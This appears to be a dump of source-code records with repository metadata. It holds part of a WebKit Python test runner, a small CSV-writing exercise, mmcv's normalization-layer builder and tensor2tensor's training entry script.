    tester.skip(('webkitpy.common.checkout.scm.scm_unittest',), 'are really, really, slow', 31818)
    if sys.platform == 'win32':
        tester.skip(('webkitpy.common.checkout', 'webkitpy.common.config', 'webkitpy.tool', 'webkitpy.w3c', 'webkitpy.layout_tests.layout_package.bot_test_expectations'), 'fail horribly on win32', 54526)

    # This only needs to run on Unix, so don't worry about win32 for now.
    appengine_sdk_path = '/usr/local/google_appengine'
    if os.path.exists(appengine_sdk_path):
        if not appengine_sdk_path in sys.path:
            sys.path.append(appengine_sdk_path)
        import dev_appserver
        from google.appengine.dist import use_library
        use_library('django', '1.2')
        dev_appserver.fix_sys_path()
        tester.add_tree(wkf.path_from_webkit_base('Tools', 'TestResultServer'))
    else:
        _log.info('Skipping TestResultServer tests; the Google AppEngine Python SDK is not installed.')

    return not tester.run()


class Tester(object):
    def __init__(self, filesystem=None, webkit_finder=None):
        self.filesystem = filesystem or FileSystem()
        self.finder = Finder(self.filesystem)
        self.printer = Printer(sys.stderr)
        self.webkit_finder = webkit_finder or WebKitFinder(self.filesystem)
        self._options = None

    def add_tree(self, top_directory, starting_subdirectory=None):
        self.finder.add_tree(top_directory, starting_subdirectory)

    def skip(self, names, reason, bugid):
        self.finder.skip(names, reason, bugid)

    def _parse_args(self, argv=None):
        parser = optparse.OptionParser(usage='usage: %prog [options] [args...]')
        parser.add_option('-a', '--all', action='store_true', default=False,
                          help='run all the tests')
        parser.add_option('-c', '--coverage', action='store_true', default=False,
                          help='generate code coverage info')
        parser.add_option('-i', '--integration-tests', action='store_true', default=False,
                          help='run integration tests as well as unit tests'),
        parser.add_option('-j', '--child-processes', action='store', type='int', default=(1 if sys.platform == 'win32' else multiprocessing.cpu_count()),
                          help='number of tests to run in parallel (default=%default)')
        parser.add_option('-p', '--pass-through', action='store_true', default=False,
                          help='be debugger friendly by passing captured output through to the system')
        parser.add_option('-q', '--quiet', action='store_true', default=False,
                          help='run quietly (errors, warnings, and progress only)')
        parser.add_option('-t', '--timing', action='store_true', default=False,
                          help='display per-test execution time (implies --verbose)')
        parser.add_option('-v', '--verbose', action='count', default=0,
                          help='verbose output (specify once for individual test results, twice for debug messages)')
        parser.epilog = ('[args...] is an optional list of modules, test_classes, or individual tests. '
                         'If no args are given, all the tests will be run.')
        return parser.parse_args(argv)

    def run(self):
        self._options, args = self._parse_args()
        # Make sure PYTHONPATH is set up properly.
        sys.path = self.finder.additional_paths(sys.path) + sys.path
        # FIXME: unittest2 and coverage need to be in sys.path for their internal imports to work.
        thirdparty_path = self.webkit_finder.path_from_webkit_base('Tools', 'Scripts', 'webkitpy', 'thirdparty')
        if not thirdparty_path in sys.path:
            sys.path.append(thirdparty_path)
        self.printer.configure(self._options)
        self.finder.clean_trees()
        names = self.finder.find_names(args, self._options.all)
        if not names:
            _log.error('No tests to run')
            return False
        return self._run_tests(names)

    def _run_tests(self, names):
        if self._options.coverage:
            _log.warning("Checking code coverage, so running things serially")
            self._options.child_processes = 1
            import coverage
            cov = coverage.coverage(omit=["/usr/*", "*/webkitpy/thirdparty/*", "/Library/*"])
            cov.start()
        self.printer.write_update("Checking imports ...")
        if not self._check_imports(names):
            return False
        self.printer.write_update("Finding the individual test methods ...")
        loader = _Loader()
        parallel_tests, serial_tests = self._test_names(loader, names)
        self.printer.write_update("Running the tests ...")
        self.printer.num_tests = len(parallel_tests) + len(serial_tests)
        start = time.time()
        test_runner = Runner(self.printer, loader, self.webkit_finder)
        test_runner.run(parallel_tests, self._options.child_processes)
        test_runner.run(serial_tests, 1)
        self.printer.print_result(time.time() - start)
        if self._options.coverage:
            cov.stop()
            cov.save()
            cov.report(show_missing=False)
        return not self.printer.num_errors and not self.printer.num_failures

    def _check_imports(self, names):
        for name in names:
            if self.finder.is_module(name):
                # if we failed to load a name and it looks like a module,
                # try importing it directly, because loadTestsFromName()
                # produces lousy error messages for bad modules.
                try:
                    __import__(name)
                except ImportError:
                    _log.fatal('Failed to import %s:' % name)
                    self._log_exception()
                    return False
        return True

    def _test_names(self, loader, names):
        parallel_test_method_prefixes = ['test_']
        serial_test_method_prefixes = ['serial_test_']
        if self._options.integration_tests:
            parallel_test_method_prefixes.append('integration_test_')
            serial_test_method_prefixes.append('serial_integration_test_')
        parallel_tests = []
        loader.test_method_prefixes = parallel_test_method_prefixes
        for name in names:
            parallel_tests.extend(self._all_test_names(loader.loadTestsFromName(name, None)))
        serial_tests = []
        loader.test_method_prefixes = serial_test_method_prefixes
        for name in names:
            serial_tests.extend(self._all_test_names(loader.loadTestsFromName(name, None)))
        # loader.loadTestsFromName() will not verify that names begin with one of the test_method_prefixes
        # if the names were explicitly provided (e.g., MainTest.test_basic), so this means that any individual
        # tests will be included in both parallel_tests and serial_tests, and we need to de-dup them.
        serial_tests = list(set(serial_tests).difference(set(parallel_tests)))
        return (parallel_tests, serial_tests)

    def _all_test_names(self, suite):
        names = []
        if hasattr(suite, '_tests'):
            for t in suite._tests:
                names.extend(self._all_test_names(t))
        else:
            names.append(unit_test_name(suite))
        return names

    def _log_exception(self):
        s = StringIO.StringIO()
        traceback.print_exc(file=s)
        for l in s.buflist:
            _log.error('  ' + l.rstrip())


class _Loader(unittest.TestLoader):
    test_method_prefixes = []

    def getTestCaseNames(self, testCaseClass):
        def isTestMethod(attrname, testCaseClass=testCaseClass):
            if not hasattr(getattr(testCaseClass, attrname), '__call__'):
                return False
            return (any(attrname.startswith(prefix) for prefix in self.test_method_prefixes))
        testFnNames = filter(isTestMethod, dir(testCaseClass))
        testFnNames.sort()
        return testFnNames


if __name__ == '__main__':
    sys.exit(main())
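# Illustrative invocation note (an assumption based on the repository layout,
# not something stated in this file): the Tester above is normally driven
# through a wrapper such as Tools/Scripts/test-webkitpy, e.g.
#
#   Tools/Scripts/test-webkitpy -v -j 8 webkitpy.common
#
# where -j maps to the --child-processes option parsed in _parse_args() and
# the trailing names are resolved by Finder.find_names().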
| [
"[email protected]"
]
| |
56a56c8ead80145924257961f4a0b23562f2d0d9 | 014e4be9addc57eb5599086dc82ba431ed406e81 | /Lesson_2/HW_2/test_file.py | b0e024eeb7ef334a196097e664b346ae69432e64 | []
| no_license | ZakirovRail/back_end | a4f20c099562f901bb107c8e7b333c890cd7995f | 0a03ef5d3283b7a6d22e1848ae8c55c4caef8010 | refs/heads/main | 2023-03-31T00:25:06.568394 | 2021-03-23T07:44:42 | 2021-03-23T07:44:42 | 334,494,409 | 0 | 0 | null | 2021-03-11T12:13:36 | 2021-01-30T19:27:57 | Python | UTF-8 | Python | false | false | 808 | py | import csv
data_to_export = [['Изготовитель системы', 'Название ОС', 'Код продукта', 'Тип системы'], ['LENOVO', 'ACER', 'DELL'], ['Microsoft Windows 7 Профессиональная', 'Microsoft Windows 10 Professional', 'Microsoft Windows 8.1 Professional'], ['00971-OEM-1982661-00231', '00971-OEM-1982661-00231', '00971-OEM-1982661-00231'], ['x64-based PC', 'x64-based PC', 'x86-based PC']]
def write_to_csv(rows):
    with open('task_1.csv', 'w') as file:
        fn_write = csv.writer(file, quoting=csv.QUOTE_NONNUMERIC)
        for row in rows:  # iterate over the argument instead of the global, and avoid shadowing built-in list
            fn_write.writerow(row)
write_to_csv(data_to_export)
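# For reference (illustrative): with QUOTE_NONNUMERIC every string field gets
# quoted, so the first line of task_1.csv should look roughly like
# "Изготовитель системы","Название ОС","Код продукта","Тип системы"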
# with open('lesson_csv.csv', 'w') as fn:
# fn_write = csv.writer(fn)
# for row in data:
# fn_write.writerow(row) | [
"[email protected]"
]
| |
e0137a3391a29e3910e09cc2baa1a7f930b2364f | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/semantic_segmentation/MMseg-swin/mmcv/mmcv/cnn/bricks/norm.py | 565c92213f2cb0b4cc2a5c62d8336442fc7d7472 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
]
| permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 8,701 | py | # -*- coding: utf-8 -*-
# BSD 3-Clause License
#
# Copyright (c) 2017
# All rights reserved.
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ==========================================================================
# Copyright (c) OpenMMLab. All rights reserved.
import inspect
from typing import Dict, Tuple, Union
import torch.nn as nn
from mmcv.utils import is_tuple_of
from mmcv.utils.parrots_wrapper import SyncBatchNorm, _BatchNorm, _InstanceNorm
from .registry import NORM_LAYERS
NORM_LAYERS.register_module('BN', module=nn.BatchNorm2d)
NORM_LAYERS.register_module('BN1d', module=nn.BatchNorm1d)
NORM_LAYERS.register_module('BN2d', module=nn.BatchNorm2d)
NORM_LAYERS.register_module('BN3d', module=nn.BatchNorm3d)
NORM_LAYERS.register_module('SyncBN', module=SyncBatchNorm)
NORM_LAYERS.register_module('GN', module=nn.GroupNorm)
NORM_LAYERS.register_module('LN', module=nn.LayerNorm)
NORM_LAYERS.register_module('IN', module=nn.InstanceNorm2d)
NORM_LAYERS.register_module('IN1d', module=nn.InstanceNorm1d)
NORM_LAYERS.register_module('IN2d', module=nn.InstanceNorm2d)
NORM_LAYERS.register_module('IN3d', module=nn.InstanceNorm3d)
def infer_abbr(class_type):
"""Infer abbreviation from the class name.
When we build a norm layer with `build_norm_layer()`, we want to preserve
the norm type in variable names, e.g, self.bn1, self.gn. This method will
infer the abbreviation to map class types to abbreviations.
Rule 1: If the class has the property "_abbr_", return the property.
Rule 2: If the parent class is _BatchNorm, GroupNorm, LayerNorm or
InstanceNorm, the abbreviation of this layer will be "bn", "gn", "ln" and
"in" respectively.
Rule 3: If the class name contains "batch", "group", "layer" or "instance",
the abbreviation of this layer will be "bn", "gn", "ln" and "in"
respectively.
Rule 4: Otherwise, the abbreviation falls back to "norm".
Args:
class_type (type): The norm layer type.
Returns:
str: The inferred abbreviation.
"""
if not inspect.isclass(class_type):
raise TypeError(
f'class_type must be a type, but got {type(class_type)}')
if hasattr(class_type, '_abbr_'):
return class_type._abbr_
if issubclass(class_type, _InstanceNorm): # IN is a subclass of BN
return 'in'
elif issubclass(class_type, _BatchNorm):
return 'bn'
elif issubclass(class_type, nn.GroupNorm):
return 'gn'
elif issubclass(class_type, nn.LayerNorm):
return 'ln'
else:
class_name = class_type.__name__.lower()
if 'batch' in class_name:
return 'bn'
elif 'group' in class_name:
return 'gn'
elif 'layer' in class_name:
return 'ln'
elif 'instance' in class_name:
return 'in'
else:
return 'norm_layer'
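# Illustrative sketch (not part of the original file, never called by this
# module): the rules above map the common norm classes onto the short prefixes
# that are later used to name layers.
def _example_infer_abbr():
    assert infer_abbr(nn.BatchNorm2d) == 'bn'
    assert infer_abbr(nn.GroupNorm) == 'gn'
    assert infer_abbr(nn.LayerNorm) == 'ln'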
def build_norm_layer(cfg: Dict,
num_features: int,
postfix: Union[int, str] = '') -> Tuple[str, nn.Module]:
"""Build normalization layer.
Args:
cfg (dict): The norm layer config, which should contain:
- type (str): Layer type.
- layer args: Args needed to instantiate a norm layer.
- requires_grad (bool, optional): Whether stop gradient updates.
num_features (int): Number of input channels.
postfix (int | str): The postfix to be appended into norm abbreviation
to create named layer.
Returns:
tuple[str, nn.Module]: The first element is the layer name consisting
of abbreviation and postfix, e.g., bn1, gn. The second element is the
created norm layer.
"""
if not isinstance(cfg, dict):
raise TypeError('cfg must be a dict')
if 'type' not in cfg:
raise KeyError('the cfg dict must contain the key "type"')
cfg_ = cfg.copy()
layer_type = cfg_.pop('type')
if layer_type not in NORM_LAYERS:
raise KeyError(f'Unrecognized norm type {layer_type}')
norm_layer = NORM_LAYERS.get(layer_type)
abbr = infer_abbr(norm_layer)
assert isinstance(postfix, (int, str))
name = abbr + str(postfix)
requires_grad = cfg_.pop('requires_grad', True)
cfg_.setdefault('eps', 1e-5)
if layer_type != 'GN':
layer = norm_layer(num_features, **cfg_)
if layer_type == 'SyncBN' and hasattr(layer, '_specify_ddp_gpu_num'):
layer._specify_ddp_gpu_num(1)
else:
assert 'num_groups' in cfg_
layer = norm_layer(num_channels=num_features, **cfg_)
for param in layer.parameters():
param.requires_grad = requires_grad
return name, layer
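# Illustrative usage (a sketch, not part of the original file; never invoked):
# build a batch-norm layer for 64 channels. The returned name embeds the
# inferred abbreviation plus the postfix, so callers can attach it via setattr().
def _example_build_norm_layer():
    name, layer = build_norm_layer(dict(type='BN', requires_grad=True), 64, postfix=1)
    # name == 'bn1'; layer is an nn.BatchNorm2d(64) whose parameters require grad
    return name, layer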
def is_norm(layer: nn.Module,
exclude: Union[type, tuple, None] = None) -> bool:
"""Check if a layer is a normalization layer.
Args:
layer (nn.Module): The layer to be checked.
exclude (type | tuple[type]): Types to be excluded.
Returns:
bool: Whether the layer is a norm layer.
"""
if exclude is not None:
if not isinstance(exclude, tuple):
exclude = (exclude, )
if not is_tuple_of(exclude, type):
raise TypeError(
f'"exclude" must be either None or type or a tuple of types, '
f'but got {type(exclude)}: {exclude}')
if exclude and isinstance(layer, exclude):
return False
all_norm_bases = (_BatchNorm, _InstanceNorm, nn.GroupNorm, nn.LayerNorm)
return isinstance(layer, all_norm_bases)
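# Illustrative check (sketch only, never executed on import): is_norm()
# recognises the registered norm base classes and honours the exclude filter.
def _example_is_norm():
    assert is_norm(nn.BatchNorm2d(8))
    assert not is_norm(nn.Conv2d(8, 8, 1))
    assert not is_norm(nn.GroupNorm(2, 8), exclude=nn.GroupNorm)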
| [
"[email protected]"
]
| |
21edcbda377b2af56762d1185106281cd740f5c3 | d8641ab3265371b9926222a80b93e039a96acd36 | /chapter_15/styleChage.py | c65955ed2b01950d7e2e3a0e921769cdf3408258 | []
| no_license | fahimkk/automateTheBoringStuff | af2256f10c8c4ea156e003291a6a309c2ae8dc7d | 6022f2dd4381a378fe360696b6a9f44cd77f873d | refs/heads/master | 2022-12-08T20:52:25.400695 | 2020-09-05T10:43:09 | 2020-09-05T10:43:09 | 284,317,477 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | import docx
import logging
logging.basicConfig(level=logging.DEBUG)
doc = docx.Document('demo.docx')
logging.debug(doc.paragraphs[0].text)
doc.paragraphs[0].style = 'Normal'
doc.paragraphs[1].runs[0].style = 'QuoteChar'
logging.debug(doc.paragraphs[1].runs[0].text)
doc.paragraphs[1].runs[1].underline = True
logging.debug(doc.paragraphs[1].runs[1].text)
doc.paragraphs[1].runs[2].underline = True
logging.debug(doc.paragraphs[1].runs[2].text)
doc.save('restyled.docx')
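# Note (illustrative): the run indices above assume how demo.docx happens to
# split its second paragraph into runs; with a differently authored document
# the same idea would be expressed as, e.g., doc.paragraphs[1].runs[0].bold = True.
# python-docx applies character formatting (underline, bold, character styles
# such as 'QuoteChar') per run, while 'Normal' above is a paragraph-level style.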
| [
"[email protected]"
]
| |
746c0dede3c27cd6aa74e780733fb994dc6886e4 | c5759366f8b2cb2e129df0637b62774225a0c41a | /code/tensor2tensor/tensor2tensor/bin/t2t_trainer.py | d25908454f0acaba3ecef93fbc7af21a24a6f56f | [
"Apache-2.0"
]
| permissive | cake-lab/transient-deep-learning | f8646a4386528aa147d8d3dcdff8089985870041 | 87c6717e4026801623cf0327e78ad57f51cb1461 | refs/heads/master | 2022-11-02T20:02:29.642997 | 2022-02-08T16:51:09 | 2022-02-08T16:51:09 | 227,036,173 | 11 | 1 | Apache-2.0 | 2022-10-05T13:01:38 | 2019-12-10T05:27:50 | Python | UTF-8 | Python | false | false | 14,549 | py | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Train and evaluate."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import sys
from tensor2tensor import models # pylint: disable=unused-import
from tensor2tensor import problems as problems_lib # pylint: disable=unused-import
from tensor2tensor.data_generators import problem # pylint: disable=unused-import
from tensor2tensor.utils import cloud_mlengine
from tensor2tensor.utils import decoding
from tensor2tensor.utils import flags as t2t_flags # pylint: disable=unused-import
from tensor2tensor.utils import registry
from tensor2tensor.utils import trainer_lib
from tensor2tensor.utils import usr_dir
import tensorflow as tf
from tensorflow.contrib.tpu.python.tpu import tpu_config
flags = tf.flags
FLAGS = flags.FLAGS
# See flags.py for additional command-line flags.
flags.DEFINE_string("t2t_usr_dir", None,
"Path to a Python module that will be imported. The "
"__init__.py file should include the necessary imports. "
"The imported files should contain registrations, "
"e.g. @registry.register_model calls, that will then be "
"available to the t2t-trainer.")
flags.DEFINE_integer("random_seed", None, "Random seed.")
flags.DEFINE_integer("tpu_num_shards", 8, "Number of tpu shards.")
flags.DEFINE_integer("iterations_per_loop", 100,
"Number of iterations in a TPU training loop.")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU.")
flags.DEFINE_bool("use_tpu_estimator", False, "Whether to use TPUEstimator. "
"This is always enabled when use_tpu is True.")
flags.DEFINE_bool("xla_compile", False, "Whether to use XLA to compile graph.")
flags.DEFINE_integer("tpu_infeed_sleep_secs", None,
"How long to sleep the infeed thread.")
flags.DEFINE_bool("generate_data", False, "Generate data before training?")
flags.DEFINE_string("tmp_dir", "/tmp/t2t_datagen",
"Temporary storage directory, used if --generate_data.")
flags.DEFINE_bool("profile", False, "Profile performance?")
flags.DEFINE_integer("inter_op_parallelism_threads", 0,
"Number of inter_op_parallelism_threads to use for CPU. "
"See TensorFlow config.proto for details.")
flags.DEFINE_integer("intra_op_parallelism_threads", 0,
"Number of intra_op_parallelism_threads to use for CPU. "
"See TensorFlow config.proto for details.")
# TODO(hinsu): Enable DistributionStrategy by default once performance gap
# between DistributionStrategy and Parallelism is resolved.
flags.DEFINE_bool(
"optionally_use_dist_strat", False,
"Whether to use TensorFlow DistributionStrategy instead of explicitly "
"replicating the model. DistributionStrategy is used only if the "
"model replication configuration is supported by the DistributionStrategy.")
# To maintain compatibility with some internal libs, we guard against these flag
# definitions possibly erroring. Apologies for the ugliness.
try:
flags.DEFINE_string("master", "", "Address of TensorFlow master.")
flags.DEFINE_string("output_dir", "", "Base output directory for run.")
flags.DEFINE_string("schedule", "continuous_train_and_eval",
"Method of Experiment to run.")
flags.DEFINE_integer("eval_steps", 100,
"Number of steps in evaluation. By default, eval will "
"stop after eval_steps or when it runs through the eval "
"dataset once in full, whichever comes first, so this "
"can be a very large number.")
except: # pylint: disable=bare-except
pass
flags.DEFINE_string("std_server_protocol", "grpc",
"Protocol for tf.train.Server.")
# Google Cloud TPUs
flags.DEFINE_string("cloud_tpu_name", "%s-tpu" % os.getenv("USER"),
"Name of Cloud TPU instance to use or create.")
# Google Cloud ML Engine
flags.DEFINE_bool("cloud_mlengine", False,
"Whether to launch on Cloud ML Engine.")
flags.DEFINE_string("cloud_mlengine_master_type", None,
"Machine type for master on Cloud ML Engine. "
"If provided, overrides default selections based on "
"--worker_gpu. User is responsible for ensuring "
"type is valid and that --worker_gpu matches number of "
"GPUs on machine type. See documentation: "
"https://cloud.google.com/ml-engine/reference/rest/v1/"
"projects.jobs#traininginput")
# Hyperparameter tuning on Cloud ML Engine
# Pass an --hparams_range to enable
flags.DEFINE_string("autotune_objective", None,
"TensorBoard metric name to optimize.")
flags.DEFINE_bool("autotune_maximize", True,
"Whether to maximize (vs. minimize) autotune_objective.")
flags.DEFINE_integer("autotune_max_trials", 10,
"Maximum number of tuning experiments to run.")
flags.DEFINE_integer("autotune_parallel_trials", 1,
"How many trials to run in parallel (will spin up this "
"many jobs.")
# Note than in open-source TensorFlow, the dash gets converted to an underscore,
# so access is FLAGS.job_dir.
flags.DEFINE_string("job-dir", None,
"DO NOT USE. Exists only for Cloud ML Engine to pass in "
"during hyperparameter tuning. Overrides --output_dir.")
flags.DEFINE_integer("log_step_count_steps", 100,
"Number of local steps after which progress is printed "
"out")
def set_hparams_from_args(args):
"""Set hparams overrides from unparsed args list."""
if not args:
return
hp_prefix = "--hp_"
tf.logging.info("Found unparsed command-line arguments. Checking if any "
"start with %s and interpreting those as hparams "
"settings.", hp_prefix)
pairs = []
i = 0
while i < len(args):
arg = args[i]
if arg.startswith(hp_prefix):
pairs.append((arg[len(hp_prefix):], args[i+1]))
i += 2
else:
tf.logging.warn("Found unknown flag: %s", arg)
i += 1
as_hparams = ",".join(["%s=%s" % (key, val) for key, val in pairs])
if FLAGS.hparams:
as_hparams = "," + as_hparams
FLAGS.hparams += as_hparams
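# Illustrative sketch (not part of the original trainer, never called): any
# leftover argv entries prefixed with --hp_ are folded into FLAGS.hparams as
# comma-separated overrides. The values below are made up.
def _example_set_hparams_from_args():
  FLAGS.hparams = "batch_size=1024"
  set_hparams_from_args(["--hp_learning_rate", "0.1", "--hp_num_layers", "4"])
  # FLAGS.hparams is now "batch_size=1024,learning_rate=0.1,num_layers=4"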
def create_hparams():
if FLAGS.use_tpu and "tpu" not in FLAGS.hparams_set:
tf.logging.warn("Not all hyperparameter sets work on TPU. "
"Prefer hparams_sets with a '_tpu' suffix, "
"e.g. transformer_tpu, if available for your model.")
return trainer_lib.create_hparams(FLAGS.hparams_set, FLAGS.hparams)
def create_experiment_fn():
return trainer_lib.create_experiment_fn(
model_name=FLAGS.model,
problem_name=FLAGS.problem,
data_dir=os.path.expanduser(FLAGS.data_dir),
train_steps=FLAGS.train_steps,
eval_steps=FLAGS.eval_steps,
min_eval_frequency=FLAGS.local_eval_frequency,
schedule=FLAGS.schedule,
eval_throttle_seconds=FLAGS.eval_throttle_seconds,
export=FLAGS.export_saved_model,
decode_hparams=decoding.decode_hparams(FLAGS.decode_hparams),
use_tfdbg=FLAGS.tfdbg,
use_dbgprofile=FLAGS.dbgprofile,
eval_early_stopping_steps=FLAGS.eval_early_stopping_steps,
eval_early_stopping_metric=FLAGS.eval_early_stopping_metric,
eval_early_stopping_metric_delta=FLAGS.eval_early_stopping_metric_delta,
eval_early_stopping_metric_minimize=FLAGS
.eval_early_stopping_metric_minimize,
use_tpu=FLAGS.use_tpu,
use_tpu_estimator=FLAGS.use_tpu_estimator,
use_xla=FLAGS.xla_compile,
warm_start_from=FLAGS.warm_start_from,
decode_from_file=FLAGS.decode_from_file,
decode_to_file=FLAGS.decode_to_file,
decode_reference=FLAGS.decode_reference,
std_server_protocol=FLAGS.std_server_protocol)
def create_run_config(hp, output_dir=None):
"""Create a run config.
Args:
hp: model hyperparameters
output_dir: model's output directory, defaults to output_dir flag.
Returns:
a run config
"""
save_ckpt_steps = max(FLAGS.iterations_per_loop, FLAGS.local_eval_frequency)
save_ckpt_secs = FLAGS.save_checkpoints_secs or None
if save_ckpt_secs:
save_ckpt_steps = None
assert FLAGS.output_dir or FLAGS.checkpoint_path
tpu_config_extra_kwargs = {}
if getattr(hp, "mtf_mode", False):
save_ckpt_steps = None # Disable the default saver
save_ckpt_secs = None # Disable the default saver
tpu_config_extra_kwargs = {
"num_cores_per_replica": 1,
"per_host_input_for_training": tpu_config.InputPipelineConfig.BROADCAST,
}
# the various custom getters we have written do not play well together yet.
# TODO(noam): ask rsepassi for help here.
daisy_chain_variables = (
hp.daisy_chain_variables and
hp.activation_dtype == "float32" and
hp.weight_dtype == "float32")
return trainer_lib.create_run_config(
model_name=FLAGS.model,
model_dir=output_dir or os.path.expanduser(FLAGS.output_dir),
master=FLAGS.master,
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.tpu_num_shards,
log_device_placement=FLAGS.log_device_placement,
save_checkpoints_steps=save_ckpt_steps,
save_checkpoints_secs=save_ckpt_secs,
keep_checkpoint_max=FLAGS.keep_checkpoint_max,
keep_checkpoint_every_n_hours=FLAGS.keep_checkpoint_every_n_hours,
num_gpus=FLAGS.worker_gpu,
gpu_order=FLAGS.gpu_order,
shard_to_cpu=FLAGS.locally_shard_to_cpu,
num_async_replicas=FLAGS.worker_replicas,
gpu_mem_fraction=FLAGS.worker_gpu_memory_fraction,
enable_graph_rewriter=FLAGS.enable_graph_rewriter,
use_tpu=FLAGS.use_tpu,
use_tpu_estimator=FLAGS.use_tpu_estimator,
schedule=FLAGS.schedule,
no_data_parallelism=hp.no_data_parallelism,
optionally_use_dist_strat=FLAGS.optionally_use_dist_strat,
daisy_chain_variables=daisy_chain_variables,
ps_replicas=FLAGS.ps_replicas,
ps_job=FLAGS.ps_job,
ps_gpu=FLAGS.ps_gpu,
sync=FLAGS.sync,
worker_id=FLAGS.worker_id,
worker_job=FLAGS.worker_job,
random_seed=FLAGS.random_seed,
tpu_infeed_sleep_secs=FLAGS.tpu_infeed_sleep_secs,
inter_op_parallelism_threads=FLAGS.inter_op_parallelism_threads,
log_step_count_steps=FLAGS.log_step_count_steps,
intra_op_parallelism_threads=FLAGS.intra_op_parallelism_threads,
tpu_config_extra_kwargs=tpu_config_extra_kwargs,
cloud_tpu_name=FLAGS.cloud_tpu_name)
def generate_data():
# Generate data if requested.
data_dir = os.path.expanduser(FLAGS.data_dir)
tmp_dir = os.path.expanduser(FLAGS.tmp_dir)
tf.gfile.MakeDirs(data_dir)
tf.gfile.MakeDirs(tmp_dir)
problem_name = FLAGS.problem
tf.logging.info("Generating data for %s" % problem_name)
registry.problem(problem_name).generate_data(data_dir, tmp_dir)
@contextlib.contextmanager
def profile_context():
if FLAGS.profile:
with tf.contrib.tfprof.ProfileContext(
"/tmp/t2tprof", trace_steps=range(100), dump_steps=range(100)) as pctx:
opts = tf.profiler.ProfileOptionBuilder.time_and_memory()
pctx.add_auto_profiling("op", opts, range(100))
yield
else:
yield
def maybe_log_registry_and_exit():
if FLAGS.registry_help:
tf.logging.info(registry.help_string())
sys.exit(0)
def is_chief():
schedules = ["train", "train_and_evaluate", "continuous_train_and_eval"]
return FLAGS.worker_id == 0 and FLAGS.schedule in schedules
def save_metadata(hparams):
"""Saves FLAGS and hparams to output_dir."""
output_dir = os.path.expanduser(FLAGS.output_dir)
if not tf.gfile.Exists(output_dir):
tf.gfile.MakeDirs(output_dir)
# Save FLAGS in txt file
if hasattr(FLAGS, "flags_into_string"):
flags_str = FLAGS.flags_into_string()
t2t_flags_str = "\n".join([
"--%s=%s" % (f.name, f.value)
for f in FLAGS.flags_by_module_dict()["tensor2tensor.utils.flags"]
])
else:
flags_dict = FLAGS.__dict__["__flags"]
flags_str = "\n".join(
["--%s=%s" % (name, str(f)) for (name, f) in flags_dict.items()])
t2t_flags_str = None
flags_txt = os.path.join(output_dir, "flags.txt")
with tf.gfile.Open(flags_txt, "w") as f:
f.write(flags_str)
if t2t_flags_str:
t2t_flags_txt = os.path.join(output_dir, "flags_t2t.txt")
with tf.gfile.Open(t2t_flags_txt, "w") as f:
f.write(t2t_flags_str)
# Save hparams as hparams.json
hparams_fname = os.path.join(output_dir, "hparams.json")
with tf.gfile.Open(hparams_fname, "w") as f:
f.write(hparams.to_json(indent=0, sort_keys=True))
def execute_schedule(exp):
if not hasattr(exp, FLAGS.schedule):
raise ValueError(
"Experiment has no method %s, from --schedule" % FLAGS.schedule)
with profile_context():
getattr(exp, FLAGS.schedule)()
def run_std_server():
exp = trainer_lib.T2TExperiment(*([None] * 5))
exp.run_std_server()
def main(argv):
tf.logging.set_verbosity(tf.logging.INFO)
if FLAGS.schedule == "run_std_server":
run_std_server()
trainer_lib.set_random_seed(FLAGS.random_seed)
usr_dir.import_usr_dir(FLAGS.t2t_usr_dir)
maybe_log_registry_and_exit()
if FLAGS.cloud_mlengine:
cloud_mlengine.launch()
return
if FLAGS.generate_data:
generate_data()
if cloud_mlengine.job_dir():
FLAGS.output_dir = cloud_mlengine.job_dir()
if argv:
set_hparams_from_args(argv[1:])
hparams = create_hparams()
exp_fn = create_experiment_fn()
exp = exp_fn(create_run_config(hparams), hparams)
if is_chief():
save_metadata(hparams)
